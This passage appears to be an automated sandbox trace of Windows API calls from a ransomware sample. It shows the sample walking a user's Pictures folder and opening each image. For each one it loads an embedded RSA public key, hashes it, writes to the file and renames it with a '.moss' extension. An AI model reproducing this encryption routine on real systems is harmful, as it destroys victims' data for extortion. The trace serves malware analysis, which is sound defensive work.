(HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50e00 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfb0 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50e48 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfc8 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dff8 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e010 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.823] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dff8 | out: hHeap=0xcd0000) returned 1 [0171.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e010 | out: hHeap=0xcd0000) returned 1 [0171.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e010 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4dff8 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa26a0 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa27b8 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e010 | out: hHeap=0xcd0000) returned 1 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dff8 | out: hHeap=0xcd0000) returned 1 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0171.824] GetCurrentThreadId () returned 0x324 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4f748 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.824] GetCurrentThreadId () returned 0x324 [0171.824] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.824] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0171.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddd0 [0171.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dff8 [0171.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0171.825] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.825] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.826] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0171.826] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0171.826] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0171.826] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e010 [0171.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0171.826] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0171.826] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfe0 [0171.826] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0171.826] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x53f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.827] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.827] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.827] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\gkhaSVWy.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\gkhasvwy.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\gkhaSVWy.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\gkhasvwy.png.moss")) returned 1 [0171.828] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.828] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.828] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.829] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x134ddb00, ftCreationTime.dwHighDateTime=0x1d5d8b4, ftLastAccessTime.dwLowDateTime=0x604eb2b0, ftLastAccessTime.dwHighDateTime=0x1d5de83, ftLastWriteTime.dwLowDateTime=0x604eb2b0, ftLastWriteTime.dwHighDateTime=0x1d5de83, nFileSizeHigh=0x0, nFileSizeLow=0x100d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SEWYUDpznLTI_L.jpg", cAlternateFileName="SEWYUD~1.JPG")) returned 1 [0171.829] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\SEWYUDpznLTI_L.jpg") returned=".jpg" [0171.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\SEWYUDpznLTI_L.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\sewyudpznlti_l.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.829] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=65751) returned 1 [0171.829] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.833] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x100b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.833] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.833] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x100d7, lpOverlapped=0x0) returned 1 [0171.834] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.834] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0171.835] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.835] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.835] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.835] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.835] GetLastError () returned 0x0 [0171.835] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.835] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0171.835] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.835] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.835] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.835] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.835] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.836] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.836] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x100d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.836] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.836] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.837] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\SEWYUDpznLTI_L.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\sewyudpznlti_l.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\SEWYUDpznLTI_L.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\sewyudpznlti_l.jpg.moss")) returned 1 [0171.837] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.837] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.837] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.838] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.838] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88895c80, ftCreationTime.dwHighDateTime=0x1d5da50, ftLastAccessTime.dwLowDateTime=0xeb2b7710, ftLastAccessTime.dwHighDateTime=0x1d5db18, ftLastWriteTime.dwLowDateTime=0xeb2b7710, ftLastWriteTime.dwHighDateTime=0x1d5db18, nFileSizeHigh=0x0, nFileSizeLow=0xadf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uyF8KRBky4U4nLZl1S9h.jpg", cAlternateFileName="UYF8KR~1.JPG")) returned 1 [0171.838] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\uyF8KRBky4U4nLZl1S9h.jpg") returned=".jpg" [0171.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\uyF8KRBky4U4nLZl1S9h.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\uyf8krbky4u4nlzl1s9h.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.839] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=44536) returned 1 [0171.839] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.842] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xadd2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.842] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.843] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xadf8, lpOverlapped=0x0) returned 1 [0171.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.843] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0171.845] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.845] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.845] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.845] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.845] GetLastError () returned 0x0 [0171.845] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.845] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0171.845] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.845] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.845] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.845] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.845] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.845] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.846] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xadf8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.846] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.846] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.847] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\uyF8KRBky4U4nLZl1S9h.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\uyf8krbky4u4nlzl1s9h.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\uyF8KRBky4U4nLZl1S9h.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\uyf8krbky4u4nlzl1s9h.jpg.moss")) returned 1 [0171.847] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.848] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.848] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.849] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.849] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13a6fde0, ftCreationTime.dwHighDateTime=0x1d5dd9e, ftLastAccessTime.dwLowDateTime=0x99aa4680, ftLastAccessTime.dwHighDateTime=0x1d5e272, ftLastWriteTime.dwLowDateTime=0x99aa4680, ftLastWriteTime.dwHighDateTime=0x1d5e272, nFileSizeHigh=0x0, nFileSizeLow=0x3ea4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="whczvEvh.bmp", cAlternateFileName="")) returned 1 [0171.849] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\whczvEvh.bmp") returned=".bmp" [0171.849] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\whczvEvh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\whczvevh.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.850] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=16036) returned 1 [0171.850] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.853] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3e7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.854] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.855] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x3ea4, lpOverlapped=0x0) returned 1 [0171.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.855] 